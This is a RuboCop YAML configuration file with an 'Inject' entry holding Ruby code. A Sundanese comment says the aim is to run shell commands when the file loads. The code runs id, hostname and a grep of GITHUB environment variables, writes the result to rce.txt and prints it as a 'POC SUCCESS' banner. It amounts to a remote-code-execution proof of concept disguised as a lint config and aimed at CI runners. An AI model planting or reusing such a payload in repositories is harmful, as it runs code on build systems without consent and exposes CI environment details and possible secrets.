require:
  - rubocop-performance

AllCops:
  TargetRubyVersion: 3.1
  # Ieu kuncina: ngajalankeun paréntah shell nalika file dimuat
  Inject:
    - ruby: |
        res = `id && hostname && env | grep GITHUB`
        File.write('rce.txt', res)
        puts "--- POC SUCCESS ---"
        puts res
        puts "--- END POC ---"

Exclude:
  - '**/bin/**/*'
  - '**/db/**/*'
  - '**/script/setup'
  - '**/vendor/**/*'
